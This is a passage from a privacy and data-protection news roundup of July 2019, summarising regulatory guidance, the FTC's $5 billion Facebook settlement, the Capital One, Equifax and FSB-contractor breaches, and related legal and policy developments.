On July 16, 2019, the European Data Protection Board [EDPB: see here] published its Annual Report for 2018 [see 34 pg PDF here]. The Report highlights that the EDPB: 1) endorsed 16 guidelines previously adopted by the Article 29 Working Party; 2) adopted four additional guidelines to clarify provisions of the General Data Protection Regulation [GDPR]; 3) adopted 26 consistency opinions to guarantee the consistent application of the GDPR by the EU data protection authorities; and 4) issued two opinions in the context of the legislative consultation process, as well as a statement on its own initiative and on the draft ePrivacy Regulation. The Report also discloses some of the topics that the EDPB aims to further consider in its two-year work program for 2019-2020, such as data subjects’ rights, the concept of controller and processor, and legitimate interest. The EDPB also plans to focus on new technologies, such as connected vehicles, blockchain, artificial intelligence and digital assistants, video surveillance, search engine delisting, and data protection by design and by default. [EDPB | Privacy & Information Security Law Blog (Hunton Andrews Kurth)]

EU – EDPB Seeks Comments on Its Guidelines on Video Data Processing

The European Data Protection Board is asking for comments on its recently adopted guidelines for processing personal data using video devices. The guidelines clarify many questions involving video surveillance, including that organizations using surveillance must explicitly notify subjects that they are doing so while also providing a detailed purpose for the technology’s use. The legal use of surveillance is also spelled out as the most common purposes are legitimate interest and necessary “in the public interest.” The guidelines also say that legal challenges of surveillance based on subjects’ consent will be permissible only in exceptional cases. The EDPB’s period for comment on the guidelines closes Sept. 9. [EDPB]

UK – ICO Opens Public Consultation on Data Sharing Code of Practice Draft

The U.K. Information Commissioner’s Office has released the latest draft of its new data sharing code of practice for public consultation. The first code of practice was published in 2011; however, the ICO is required to update the document under the Data Protection Act 2018. The revamped code will “explain and advise on changes to data protection legislation where these changes are relevant to data sharing.” It will also address aspects of the act, such as the sections on transparency and the lawful bases for data processing. The public consultation will be open until 9 Sept. Feedback can be submitted via the ICO’s online survey or email. [ICO.org.uk]

EU – CNIL Announces Guidelines for Cookies, Trackers

France’s data protection authority, the CNIL, has published guidelines on the use of cookies and other types of trackers. The guidelines will replace the authority’s 2013 recommendations to operators on the obligation to obtain consent for the use of cookies. The CNIL said the update was necessary because the prior recommendation “was not compatible with the new provisions of the [EU General Data Protection Regulation].” The new guidelines, which are part of the authority’s recent action plan for online marketing, will be supplemented by a final recommendation that will go into effect in 2020.[CNIL.fr]

Facts & Stats

US – 2019 Cost of a Data Breach Report

The 2019 Cost of a Data Breach Report is now out [see PR here & access here & here] This is the 14th such report conducted by the Ponemon Institute [here] for IBM In this year’s report, we studied the costs associated with breaches that occurred between July 2018 and April 2019 at 507 organizations in 16 countries and regions and across 17 industry sectors. The global average cost of a data breach for the 2019 study is $3.92 million, a 1.5% increase from the 2018 study [here]. As shown in the following chart, the average total cost of a data breach climbed from $3.5 million in 2014, showing a growth of 12 percent between 2014 and 2019 [the remainder of this long blog post: 1) reviews the study highlights; 2) examines Top Cost Mitigating Factors such as Incident Response Teams, Plans and Encryption; and 3) The Long-Tail Costs of a Data Breach. There are so many more illuminating ways to look at the cost of a data breach, and the 2019 Cost of a Data Breach Report offers much more than can be covered in a single blog post. For example, the report goes into great detail about the regional and industry differences in total cost, customer turnover, data breach size and data breach life cycle. Plus, we looked in greater depth at the impacts of an effective incident response strategy. We also examined the cost impacts of security automation using technologies such as AI, machine learning, analytics and automated post-breach orchestration. [Security Intelligence (IBM)

Finance

CA – Federal Court Dismisses FATCA Charter Challenge

In a ruling dated July 22, Federal Court of Canada Justice Anne Mactavish dismissed an appeal from two American citizens, Gwendolyn Deegan and Kazia Highton, who now live in Canada and have no real ongoing connection with the United States [read the ruling and the original 24 pg PDF complaint]. The U.S. Foreign Account Tax Compliance Act, or FATCA, requires financial institutions in countries outside the United States to report information about accounts held by U.S. individuals, including Canadians with dual citizenship. Deegan and Highton challenged the constitutionality of Canadian provisions implementing an agreement between the countries that makes the information-sharing possible. They argued the provisions breached charter guarantees that prevent unreasonable seizure and ensure equality of people under law. Mactavish concluded that although the provisions do result in the seizure of the banking information of Americans in Canada, the affected people have only a limited expectation of privacy in their banking information. [Advisor’s Edge | Court dismisses challenge of deal that helps U.S. nab tax cheats in Canada | French Court Declines to Overturn Tax Treaty With U.S.]

WW – Report: Cyberinsurance Premiums Reached $2B in 2018

A study from Moody’s Investors Service found cyberinsurance premiums grew to $2 billion in 2018 and have seen a cumulative annual growth rate of 26% since 2015. Moody’s found global insurance companies have financially benefited from the increased demands for cyberinsurance. “The proliferation of new rules around the globe boosts demand for cyber insurance, but also raises questions and highlights uncertainty around the scope of insurance coverage,” Moody’s Associate Managing Director Sarah Hibler said. The report noted claims are normally high as cyberattacks have the potential to have a high number of victims and that situations may get worse as more companies move to cloud computing. [South China Morning Post]

FOI

CA – Alberta’s Sunshine List Legislation Under Review

The 2018 sunshine list disclosed the pay and benefits of the province’s top earners paid by the public purse. The threshold to be included on the sunshine list was $108,784 for government employees and included approximately 2,600 public servants. For employees of boards, agencies and commissions, compensation had to add up to $129,809 or more to be disclosed. United Conservative house leader Jason Nixon tabled a motion on July 2 to examine the Public Sector Compensation Transparency Act [see here], which first came into force Dec. 11, 2015. MLAs on the resource stewardship committee [see here] agreed to go back to 170 public sector bodies, government departments and other stakeholders contacted last year to invite submissions. The new review will give interested parties and members of the public until Sept. 9 to offer their thoughts. In 2018, top earners on the sunshine list included Alberta Electric System Operator president and CEO David Erickson ($926,976 in pay and benefits), Workers’ Compensation Board president and CEO Guy Kerr ($907,484 in salary and benefits) and University of Alberta president and vice-chancellor David Turpin ($766,203 in pay and benefits). The top compensated government employee was Marcia Nelson, deputy minister of executive council, who took home $487,137 in salary and benefits. [Edmonton Journal | Review of sunshine list legislation resumes after Alberta election | Alberta’s sunshine list still keeping one key profession in the shadows: doctors]

Genetics

US – DNA Testing Creates Predicaments for Family Historians

The popularity of DNA testing has created an unexpected dilemma for family historians. There are millions of family trees online, and some DNA-testing sites allow members to reach out to each other through a built-in messaging app. While there are benefits to this, today’s family historian now has to “juggle the privacy of their relatives, some of whom don’t want to be involved, alongside the curiosity of strangers who arrive with evidence that they are part of the family and may want to establish a relationship.” [The Wall Street Journal]

US – Ancestry CEO: Customers Should Use Caution When Sharing Genetic Data

Ancestry CEO Margo Georgiadis is urging consumers to be careful when choosing a take at-home DNA test to learn more about their genetic history. Consumers may not realize their data could be shared with law enforcement, drug companies and, in some cases, app developers. Georgiadis, who spoke at Fortune’s Brainstorm Tech conference earlier this week, said Ancestry “does not cooperate with law enforcement unless compelled by a court order.” In June, Ancestry, 23andMe and Helix formed the Coalition for Genetic Data Protection to protect customers’ information. [Fortune]

Health / Medical

US – Healthcare Leads in Data Breaches Reported, Survey Finds

While nearly all U.S. healthcare organizations including providers are collecting, storing or sharing sensitive information within technologies like cloud platforms, fewer than 40% encrypt data in such environments, according to a new report by French security company Thales and analysis firm IDC [read 3 pg PDF PR here & access report here]. Seven in 10 organizations reported they had experienced a data breach at some point, and a third said there had been a breach in the past year. Thales said those numbers are the highest among industries it has studied. While the country’s healthcare organizations may realize the threat, with 40% acknowledging they are “very” or “extremely” vulnerable, they appear overconfident in their ability to thwart security lapses. The survey showed 73% of respondents felt their security for new technology deployments is “very” or “extremely” secure. The findings jibe with other recent reports. An Integris Software survey from last month [see 40 pg PDF here & coverage here] found 70% of mid- to large-size healthcare companies in the U.S. were confident in their ability to manage sensitive data, but half updated their inventory of such data once a year or less. [Healthcare Dive

Horror Stories

US – FTC Fines Facebook Historic $5B for Privacy Violations

TechCrunch: On July 24 the FTC officially announced the terms of its settlement with Facebook: $5 billion (as previously rumored) and improved privacy oversight within the company . The order-mandated privacy program covers Facebook-owned WhatsApp and Instagram, as well as Facebook’s eponymous social platform. [read long FTC PR here, watch 55 min FTC presser here, read FTC 50 pg PDF Complaint document here and FTC 31 pg PDF terms of settlement document here – also read FTC blog post on todays events here] The FTC first confirmed that it was investigating Facebook in March of last year, during the then-new hubbub surrounding Cambridge Analytica’s abuse of data siphoned from the network. The regulator was specifically concerned that Facebook had been systematically violating the terms of its 2012 agreement [read 2012 FTC PR & related docs here], which barred them from a number of practices concerning user data. The order was approved in a 3-2 vote by the agency’s commissioners. The two Democrat commissioners who voted against the settlement were Rohit Chopra [read his 21 pg PDF statement of reasons here] and Kelly Slaughter [read here 15 pg PDF statement of reasons here] The FTC notes that the penalty against Facebook [$5 Billion] is the largest ever imposed on any company for violating consumers’ privacy — as well as flagging that it’s “almost 20 times greater than the largest privacy or data security penalty ever imposed worldwide”. In addition to the money, Facebook will have to create a board committee on privacy, and must provide executive assurance that user data is being respected. The FTC says the structure of its 20-year order against Facebook removes the “unfettered control” over privacy decisions exercised by CEO Mark Zuckerberg — by creating greater accountability at the board of directors level via the establishment of what it calls an “independent privacy committee” Facebook will also be required to designate compliance officers who will be responsible for Facebook’s privacy program. [As per the FTC PR here] “Facebook CEO Mark Zuckerberg and designated compliance officers must independently submit to the FTC quarterly certifications that the company is in compliance with the privacy program mandated by the order, as well as an annual certification that the company is in overall compliance with the order. Any false certification will subject them to individual civil and criminal penalties.” Another strand is aimed at strengthening external oversight of Facebook, with the FTC claiming enhancements to audit processes which must take place every two years to evaluate the effectiveness of Facebook’s privacy program and identify any gaps. Facebook must also conduct a privacy review of every new or modified product, service, or practice before it is implemented, and document its decisions about user privacy, per the order. The order also imposes security breach disclosure requirements on Facebook, which is required to document incidents when data of 500 or more users has been compromised, along with details of how it has sought to fix the problem — and provide that to the FTC and the assessor within 30 days of discovering the breach. The FTC notes a laundry list of what it couches as “significant new privacy requirements” that it’s also imposing on the company — writing that: 1) Facebook must exercise greater oversight over third-party apps, including by terminating app developers that fail to certify that they are in compliance with Facebook’s platform policies or fail to justify their need for specific user data; 2) Facebook is prohibited from using telephone numbers obtained to enable a security feature (e.g., two-factor authentication) for advertising; 3) Facebook must provide clear and conspicuous notice of its use of facial recognition technology, and obtain affirmative express user consent prior to any use that materially exceeds its prior disclosures to users; 4) Facebook must establish, implement, and maintain a comprehensive data security program; 5) Facebook must encrypt user passwords and regularly scan to detect whether any passwords are stored in plaintext; and 6) Facebook is prohibited from asking for email passwords to other services when consumers sign up for its services. There are already criticisms of the order for not being strong enough — including from current FTC commissioners Rohit Chopra [21 pg PDF] and Kelly Slaughter [15 pg PDF] Likewise, FTC’s former CTO, Ashkan Soltani [here] told TechCrunch [the settlement] was a “terrible outcome” for his former employer. “Facebook’s dominated the press schedule the entire time,” he told us. “They’ve controlled when this release is, same day as the Mueller [testimony], same day as their earnings’ call. The $5BN number — while significant for the agency is essentially a ‘get out of jail’ card for Facebook,” he added, noting that the order indemnifies for any behavior prior to June 12 — “which is I think unheard of”. “It’s kind of crazy in terms of how good of a deal this was for the company.” That such a favorable result could be signed off by even three of five commissioners is “a sign of who the FTC is”, he also said. “I don’t think it really addresses the direction that Facebook is moving towards and it really highlights the lack of authority that the agency has” Facebook has responded to the penalty announcement in a lengthy blog post penned by general counsel, Colin Stretch. In another response, Mark Zuckerberg has posted a comment about the settlement on his Facebook page — where he says “we’re going to make some major structural changes to how we build products and run this company” [read here – also watch this short clip of him discussing FTC settlement at a company-wide event July 24 here ]. [IAPP]

US – FTC Fines Facebook $5B, Imposes New Privacy Rules

Canadian Facebook users could benefit from new privacy rules imposed by U.S. authorities as part of an historic $5-billion U.S. Federal Trade Commission settlement with the social media giant [FTC PR here, watch 55 min FTC presser here, read FTC 50 pg PDF Complaint document here and FTC 31 pg PDF terms of settlement document here – also read FTC blog post on todays events here]. FTC officials told reporters that new privacy rules imposed on Facebook could have a far greater impact on the company’s operations than the enormous fine. Moreover the new privacy rules could apply to Facebook’s roughly 23 million users in Canada, where the company has been accused of skirting privacy rules and refusing to comply with federal law. In April, Privacy Commissioner Daniel Therrien said that the social media giant broke Canadian privacy law in the Cambridge Analytica scandal, when 87 million Facebook users had their personal information harvested by researcher Aleksandr Kogan [read PR here]. Despite 622,000 Canadians having had their personal information collected — the vast majority without their knowledge or consent — Facebook said in April it was “disappointed” in Therrien’s report [see here] into the Cambridge Analytica scandal, and that there was no evidence that the data was shared with Cambridge Analytica. Therrien’s office said it still intends to bring its complaint to Federal Court, and that it is reviewing the FTC’s decision “with interest.” [The Star and Next in the Facebook-Cambridge Analytica scandal: Canadian privacy commissioners’ report on AggregateIQ | Facebook settles with FTC: $5 billion and new privacy guarantees | Today was Facebook’s worst day ever, and it won’t make a difference | The FTC Wants More Privacy, Less Zuckerberg, at Facebook | 9 reasons the Facebook FTC settlement is a joke | Here’s Why Facebook’s FTC Settlement Is a Joke | There’s Zero Chance Facebook’s FTC Fine Stops Future Abuse, Lawmakers and Privacy Experts Say | Facebook ends friend data access for Microsoft and Sony, the last 2 of its legacy partners, under FTC deal | Statement by FPF CEO Jules Polonetsky: Facebook Case Shows It Is Time to Give the FTC Enhanced Civil Penalty Authority | The FTC-Facebook Settlement Does Too Little to Protect Your Privacy | Public Knowledge Responds to Facebook Announcement of FTC Investigation | FTC Issues Facebook Fine, EPIC – “Too little, too late.”]

WW – Capital One Breach

Credit card company Capital One has acknowledged that a data breach has compromised personal information of 100 million US customers and 6 million Canadian customers. The affected data include information collected from customers at the time they applied for credit cards between 2006 and 2019 as well as credit scores, credit limits and balances, and contact information. The FBI has arrested a suspect in the case. capitalone.com: Capital One Announces Data Security Incident | zdnet: 100 million Americans and 6 million Canadians caught up in Capital One breach | arstechnica: Hacker ID’d as former Amazon employee steals data of 106 million people from Capital One | Everything Canadians need to know about the Capital One data breach | Capital One data breach: Morneau calls for investigation into hack affecting Canadians]

US – Equifax Agrees to Pay $1.4B In Class-Action Suit Over 2017 Breach

On the same day it was hit with a $700 million fine by the U.S. Federal Trade Commission, Equifax has agreed to a proposed settlement worth at least $1.4 billion in a multidistrict class-action suit over its 2017 data breach. According to court papers filed at a U.S. District Court in Georgia, the settlement features a $1 billion commitment by the credit-reporting company to improve cybersecurity measures over the next five years. Equifax will also establish a $380.5 million fund over a four-year span that will go toward credit monitoring and financial help for any of the 147 million victims who are still feeling the effects of the breach. [law.com]

RU – Russian Intelligence Agency FSB Suffers Largest Data Breach in Its History

FSB, Russia’s largest and most powerful intelligence agency [see wiki] recently suffered the largest data breach in its history when a hacker group stole 7.5 terabytes of data from one of its largest contractors [to grasp the enormity of 7.5 terabytes of data think of 750,000 Webster’s Collegiate Dictionaries side-by-side – see here]. The massive data heist was carried out by a hacker group known as Digital Revolution that now claims to possess vast amounts of data concerning several of the FSB’s covert activities that include data scraping from social media platforms, unearthing identities of individuals who engage in secret communications on Tor, and creating a closed Internet for Russia. These documents were stolen by the hacker group 0v1ru$ (possibly a subsidiary of Digital Revolution) from the servers of SyTech, one of the FSB’s largest contractors. According to reports, SyTech works mostly with FSB’s 16th Directorate which is responsible for signals intelligence. While many of the stolen documents have been posted to Twitter by Digital Revolution via a series of tweets, the hacker conglomerate has also shared a large number of documents obtained from SyTech with several journalists. None of the covert activities of FSB that were unearthed by 0v1ru$ will surprise Russia watchers as the Putin administration has been known for increasing surveillance on domestic Internet users, creating an isolated version of the Internet that will work only in Russia, as well as carrying out a number of operations that involve the use of social media platforms. [TEISS | Russia’s Secret Intelligence Agency Hacked: ‘Largest Data Breach In Its History’ | Hackers steal 7.5 terabytes of data from Russian security agency ]

WW – Data Breach Affects 100M Online Invitation Users

More than 100 million Evite users had their data exposed when hackers gained access to its servers. Earlier this year, the online invitation site revealed attackers breached its servers and were able to access user information, including personal information, email addresses and, in some case, phone numbers and mailing addresses. The breach was thought to have affected 10 million users; however, data breach monitoring service Have I Been Pwned received a database containing nearly 101 million affected users. “Upon investigation, they found unauthorised access to a database archive dating back to 2013,” Have I Been Pwned said in a statement. [Bleeping Computer]

Identity Issues

IN – India Stirs Privacy Concerns with Proposed Aadhaar, Health Records Merge

A proposal to combine India’s Aadhaar identification system and the country’s health system into one database is drawing backlash from privacy advocates. The proposed merger was announced by India’s Health Ministry in its National Digital Health Blueprint report, which is now open for public consultation. The ministry is aiming to boost India’s health system while streamlining access to both personal and health records. The privacy concerns stem from prior issues with Aadhaar safeguards and the concept of expanding government access to personal and sensitive information. “This function creep is very worrying,” Indian Institute of Management Associate Professor Reetika Khera said. “It’s trying to engulf every aspect of a human’s life in India.” [FT.com]

WW – UN Official: Privacy Rights Under Threat With Irish Govt’s National ID Card

UN special rapporteur on extreme poverty Prof Philip Alston has called out the Irish government’s roll-out of the Public Services Card [PSC] which contains biometric information by saying the government introduced the card “without any transparency of public debate” during a conference in Dublin organised by the Irish Council for Civil Liberties (ICCL) [watch, read ICCL post & 11 pg PDF report] As of 2018, the government had issued the card to roughly 2.5 million people. The card was initially for people getting social welfare payments. But that role has now been expanded to include a number of other areas where it’s apparently required which prompted Alston to ask “what are the intentions of the government?” in creating the card. He argued that governments generally “find it very difficult to resist the temptation to use” data gathered about their citizens while emphasising that: “we have no information as to what state agencies will be able to gain access to the biometric information stored on the card.” He believes that assorted government agencies might be able to access “sensitive” information about a person in the future. And he asserted that the card: “does have at least the potential to really, very significantly, transform your relations with government and certainly your ability to maintain any shred of privacy.” For its part the ICCL maintains the “government is centralising biometric information in a database”. Given this, there’s a risk that the data will be “vulnerable to misuse, attacks, and leaks”. And it went on to declare that the PSC is “probably illegal under EU law”. [The Canary] See also: Here’s everything you need to know about Public Services Cards | Public Services Card an example of ‘how technology can be used against people living in poverty’]

US – Equifax Will Examine Alternatives for Confirming Identities of US Consumers

A provision in Equifax’s recent settlement with the U.S. Federal Trade Commission, Consumer Financial Protection Bureau, and 50 states and territories calls on the credit-reporting firm to explore alternatives to identifying U.S. residents beyond Social Security numbers. Equifax will fund a study on possible alternatives and file a report on its conclusions to California Attorney General Xavier Becerra. “I’m hopeful that this will lead to changes in the industry that will better secure people’s information,” Pennsylvania Attorney General Josh Shapiro said. Mayer Brown Cybersecurity and Data Privacy Attorney Marcus Christian said the provision is a rarity but added that the U.S. is “in desperate need of a way other than Social Security numbers to identify people.” [The Wall Street Journal]

US – Health Care Industry Pressing Lawmakers for National Patient Identifier

Health care industry leaders held a congressional briefing to implore the U.S. Senate to fund the creation of a patient identifier. The House of Representatives voted in June to approve the funding for identifiers, which was banned and removed from the Health Insurance Portability and Accountability Act in 1998. “Exchanging medical records between provider organizations becomes problematic without a reliable way of identifying the patient,” Forrester Analyst Jeff Becker said at the briefing. The American Health Information Management Association and College of Healthcare Information Management Executives added in a joint statement that lifting the ban would help to identify ways to limit medical errors and protect patient privacy. [TechTarget]

WW – Study Shows Anonymized Data Lacks Complete Privacy

Privacy researchers have published a study that reveals anonymized data can be traced back to its owner. The research and a supporting demonstration tool show that data can be traced back by way of reverse engineering from machine learning. Working with an unidentified number of datasets, researchers correctly re-identified 99.98% of Americans’ anonymized data through 15 characteristics, including basic identifiers, such as age, gender and marital status. “While there might be a lot of people who are in their thirties, male, and living in New York City, far fewer of them were also born [Jan. 5], are driving a red sports car, and live with two kids (both girls) and one dog,” UCLouvain’s Luc Rocher said. [Tech Xplore]

CA – Identifiers Need Revamp for Digital Age, Desjardins CEO Tells MPs

The current system for identifying Canadians is inadequate for the digital age, the chief executive of Desjardins Group [Guy Cormier – see here] told MPs in an emergency meeting of the Commons Public Safety and National Security Committee [SECU: see here & meeting notice here] grappling with the fallout of a major data breach at his financial-services company. The breach, revealed in June, saw the leak of names, addresses, birthdates, social-insurance numbers and other private information from roughly 2.7 million people and 173,000 businesses [read company PR’s here & here and news coverage here]. Earlier in the day, Cormier announced Desjardins would extend protections to all of its clients by protecting and compensating them for fraudulent transactions, giving them access to services to deal with identity theft, and paying related fees if identity theft occurs [read PR here]. He noted that 13 per cent of the co-operative’s members — more than 360,000 people — had signed up for credit monitoring through Equifax and that company had offered its own protections in order to cover the percentage of clients who were not signed up through Equifax. He said was “ambivalent” about the committee meeting because he thought it was “premature” to discuss the situation while the investigation is still on. But he said his company is committed to being transparent and working with authorities on the issue. “We must all learn from what Desjardins has undergone,” Cormier said in French. He said that although he could not recommend a particular new regime for identifying people in the digital age, “the status quo is not an option” when it comes to preventing identity theft and protecting private data. He recommended the government convene a special working group made up of representatives from the government, the financial sector, telecommunications, legal experts and others to determine a new framework for data and privacy in Canada. However John McKay, the Liberal chair of the committee, said the committee has not set any further meetings on the subject and would likely not take it up again this summer. He said he hopes the next version of his committee, formed after the election, would examine what he called a perfect case study of cybersecurity gone wrong. McKay said he felt as though Desjardins had not been adequately held to account over procedures (or lack of them) in place to stop employees from breaching data protection rules. “I would have preferred to see questioning be far more pointed,” he said in an interview after the meeting. [I contrast] Alberta Conservative MP Glen Motz [see here] said “We’re here to listen to them, to understand their perspective, and to develop a way forward that is going to be advantageous to all Canadians” Though it bore some responsibility, Desjardins “is also a victim in this,” he said. Denis Berthiaume [read bio here], the chief operating officer at Desjardins, said the cybersecurity risk posed by employees was one of the most difficult to manage. But he said the company did have strong security policies and this was a case of an employee violating all those rules and procedures. On May 8 Conservative Leader Andrew Scheer had called for members to look into whether re-issuing social insurance numbers for those affected might help protect them from identity theft and fraud [news coverage here]. But during testimony, a senior official from Service Canada said new insurance numbers would not necessarily stop the fraud, and could result in further errors during the re-issuing process. In addition to the committee’s meeting and police investigation, privacy commissioners in Ottawa and Quebec will be working in tandem to investigate the issue and determine whether Desjardins had adequate data-protection policies in place [read joint notice here]. [Financial Post]

Internet / WWW

WW – Online Publishers Affected by Ad Changes

Google’s latest update for its Chrome browser protects user privacy by preventing “unacceptable audience monitoring” within its browser. Before the latest update, publishers had the ability to recognize when visitors were browsing using incognito mode and could prompt users to use a different browser or log in to the site. Google News and Web Partner Development Manager Barb Palser said that workaround was an “unintended loophole.” In a recent blog post, Palser wrote, “In situations such as political oppression or domestic abuse, people may have important safety reasons for concealing their web activity and their use of private browsing features. We want you to be able to access the web privately, with the assurance that your choice to do so is private as well.” [Adweek]

Law Enforcement

CA – RCMP Accidentally Revealed Suicide Attempt Info to 160 People

The Royal Canadian Mounted Police accidentally sent the details of an individual’s suicide attempt to the inboxes of more than 160 people, CBC News reports. According to a copy of a Privacy Act breach report on the incident, the details included the person’s name, data of birth, the details of the suicide attempt, the injuries they suffered and the hospital where they recovered. RCMP Spokesperson Corporal Caroline Duval said the Office of the Privacy Commissioner of Canada has been notified of the incident. Meanwhile, Vice reports the RCMP’s use of drones has doubled since 2015. [CBC.ca]

CA – Police Seek Internet-Based Access to Info for Media After Privacy Commissioner Finding Silences Scanners

Both Saskatoon and Regina police services say they have closed their scanner channels to media to comply with the Local Authority Freedom of Information and Protection of Privacy legislation [see here & here]. Municipal police services in the province became subject to the act at the beginning of 2018. The act allows media and members of the public to file freedom of information requests to obtain records not otherwise publicly disclosed. After the Saskatoon Police Service became subject to the act, it reviewed its information-sharing agreements, including media access to its main dispatch channel. It sought the advice of Saskatchewan Information and Privacy Commissioner Ron Kruzeniski [here] on the matter and he advised the service that the long-standing practice did not comply with the legislation. The service plans to have a “next best” solution in place sometime this fall that’s expected to be internet-based, saying it values “the transparency and accountability it has established with the media and the public” and has already held meetings with media outlets. Kruzeniski said his recommendation was rooted in considerations about the protection of personal information, specifically that the legislation says it shouldn’t be disclosed to others unless the local authority — in this case, the police — have the individual’s consent. There are some exceptions that do allow police to disclose information to the public without getting an individual’s consent. “After these technological changes are made and people look at personal information, it’s kind of up to the police and the media outlets to work out some sort of arrangement that will work for both of them,” he said. The Regina Police Service followed Saskatoon in conducting a privacy review. On July 5, the service terminated its Media Radio agreement with four local outlets in the city. It too is looking for an alternate means of sharing information with media. Lawyer Sean Sinclair [see here & blog note here], who represents media outlets including the Saskatoon StarPhoenix and Regina Leader-Post, said there is a public interest in the revelation of personal information. At the same time, there’s very little private information transmitted over the police scanners. “There is a huge public interest in ensuring that the media have access to that timely information so that they can alert the public to the issues that are occurring. Looking at this from a very practical point of view, there is very little downside to what the prior arrangements were and there were significant benefits,” Sinclair said. Such situations could include street closures or locations of traffic accidents to avoid, but could also include warning the public to stay out of an area where a high-speed police pursuit is taking place. Sinclair said if the media cannot provide this service as it has in the past, police would need to do it themselves — meaning there would be a greater use of police resources for communications. [Saskatoon StarPhoenix | Police removing media access to radio scanners in Sask]

Location

US – AT&T Sued by CA Customers for Selling Location Data to Aggregators

On July 16 AT&T was sued by the Electronic Frontier Foundation [read PR here & overview here] in the Northern District of California [representing] customers alleging that AT&T sold their location data to data aggregators without their consent. The proposed class action suit was filed on behalf of all AT&T wireless customers from 2011 to date [see Scott et al v. AT&T Inc. et al here & 80 pg PDF complaint here]. The suit alleges that AT&T sold customers’ location data to LocationSmart] and Zumigo [see here], third party service providers that provide location-based services to corporations without AT&T customers’ consent [view related post]. Wireless companies agreed to limit the sale of location data last year at the request of several members of Congress. The suit alleges that AT&T failed to protect the customers’ confidentiality and that it has breached its duties to customers by disclosing location information to “thousands of third parties for years.” According to the suit, AT&T’s sharing of location based information to third parties was not transparent and customers were unaware that the information was being shared while they were using their phones. The suit asks for monetary damages and an order to ban the sale of location based information. AT&T denies the allegations, and has stated that it only shares location data with customers’ consent and that it stopped sharing location data with aggregators after it pledged to do so. [Data Privacy + Security Insider (Robinson+Cole) | EFF Hits AT&T With Class Action Lawsuit for Selling Customers’ Location to Bounty Hunters | Courthouse News Service]

Online Privacy

WW – Popular Photo Apps May Provide Data to Governments

The growth of photo apps has caused concern over tech companies’ potential collaboration with governments. Pointing to popular Chinese programs, the article notes how the absence of a framework to protect data from a government request could expose user data. Leland Miller, CEO of independent data-tracking company China Beige Book, said anyone using a Chinese app is “vulnerable” to government access and added, “there is no law sufficient enough to safeguard user data if the government chooses to request this information.” [CNBC]

CN – Apps Collect Too Much User Data: Regulators

Chinese regulators are investigating a number of firms whose financial apps may be collecting more user data than necessary. China’s Personal Information Protection Task Force on Apps found the apps had access to large amounts of data that was accessed without user consent. It also found the firms did not provide clear data protection guidelines to users. Firms responsible for nearly 40 smartphone apps have been given 30 days to address the issues. [TechNode]

WW – Browser Extensions Gathered Data from 4M Chrome, Firefox Users

Washington Post Technology Columnist Geoffrey Fowler and Security Researcher Sam Jadali discovered six browser extensions gathered data from 4 million Chrome and Firefox users. The extensions collected the information without authorization from either browser. Jadali found the extensions, which included Hover Zoom and FairShare Unlock, were able to get sensitive information, such as tax returns, medical records, credit card information, vehicle identification numbers, Facebook photos and home surveillance videos found on security devices. Data collected by the extensions was shared with data broker Nacho Analytics, which would sell it for $10 to $49. Mozilla and Google were both notified of the practices. The tech companies issued statements telling users the leaks have stopped. [Consumer Reports]

WW – Android Apps Delayed Upgrade to Prolong Data Collection

When Android 6 (Marshmallow) was released in October 2015, it included a change that allowed users to grant permissions on a per-permission basis rather than granting apps blanket permissions. Researchers at the University of Maryland found that some app developers delayed updating their apps to run on Android 6 so they could take advantage of more less restrictive permission controls. By declaring themselves “legacy apps,” they were able to revert to the older permission mechanism. The developers who delayed upgrading their apps found that they began receiving negative reviews in the app store. [zdnet: Permission-greedy apps delayed Android 6 upgrade so they could harvest more user data]

US – FTC to Issue Fine Over YouTube Kids’ Privacy Violations

The U.S. Federal Trade Commission has finalized a settlement that includes a multimillion-dollar fine with Google as part of findings it inadequately protected kids who used YouTube. The FTC, which voted along party lines to approve the settlement, also found the tech giant improperly collected kids’ data in breach of the Children’s Online Privacy Protection Act. The amount of the fine has not been disclosed. The Department of Justice is currently reviewing the details of the settlement. [The Washington Post]

Other Jurisdictions

AU – Australia Seeks Creation of Office to Regulate Tech Companies

An Australian Competition and Consumer Commission report recommends the country create an office to examine how tech companies, such as Facebook and Google, use algorithms to send targeted ads, Reuters reports. Australian Treasurer Josh Frydenberg accepted the ACCC’s “overriding conclusion that there is a need for reform,” adding the Australian government intends to “lift the veil” on the algorithms the tech companies use to gather and monetize user data. The office would be a branch of the ACCC and was one of 23 recommendations made by the agency in its report, which also included calls for enhanced privacy laws and protections for news media. [Reuters]

AU – NSW Seeks Public Consultation on Mandatory Breach Reporting

The New South Wales Information and Privacy Commission announced the Department of Communities and Justice has released a discussion paper for mandatory reporting of data breaches by public agencies in the state. The department seeks public consultation on the proposed requirement to notify the NSW privacy commissioner and affected individuals of a breach and on the operation of the notification scheme. Breach reporting isn’t currently mandatory in the Australian state. The discussion paper comes after the NSW opposition party introduced a bill in June that called for mandatory breach notifications for government agencies. [ipc.nsw.gov.au]

AU – Law Council of Australia Calls for Warrants to Access Telcom Metadata

The Law Council of Australia has called for the use of warrants when enforcement agencies seek to access metadata from the country’s telecommunication companies. Enforcement agencies currently have access to two years’ worth of data without a warrant. In a submission to the Parliamentary Joint Committee on Intelligence and Security, the council wrote, “The Law Council considers that access to the telecommunications data by a particular agency should only be accessible by warrant unless the access is strictly necessary due to an emergency situation,” adding that protections extended to journalists should be broadened to the whole population. [ZDNet]

Privacy (US)

US – FTC Sues Cambridge Analytica, Settles With Former CEO and App Developer

Following its announcement of a $5 billion fine for Facebook [read FTC PR here], the Federal Trade Commission filed a lawsuit against the company at the center of privacy scandal, Cambridge Analytica. The complaint says that the data firm was responsible for “deceptive acts and practices to harvest personal information from Facebook users” [read FTC PR notice here & 14 pg PDF complaint here]. The FTC also settled with the app developer Aleksandr Kogan [read 10 pg PDF here], who worked for the firm, and former Cambridge Analytica CEO Alexander Nix [read 10 pg PDF here]. The two agreed to follow FTC orders and destroy all personal information acquired. Cambridge Analytica shut down in May 2018 following the Facebook privacy scandal. On Wednesday, the FTC announced that Facebook will pay a $5 billion fine for how it handles its users’ privacy, including in violation of a 2012 order from the commission. At the same time, Facebook settled with the Securities and Exchange Commission for $100 million after a probe found the social media company didn’t give investors warnings of third parties violating Facebook policies. [TechCrunch | FTC sues Cambridge Analytica, settles with firm’s former CEO and app developer]

US – Facebook Agrees to $100 Million SEC Settlement After Privacy Probe

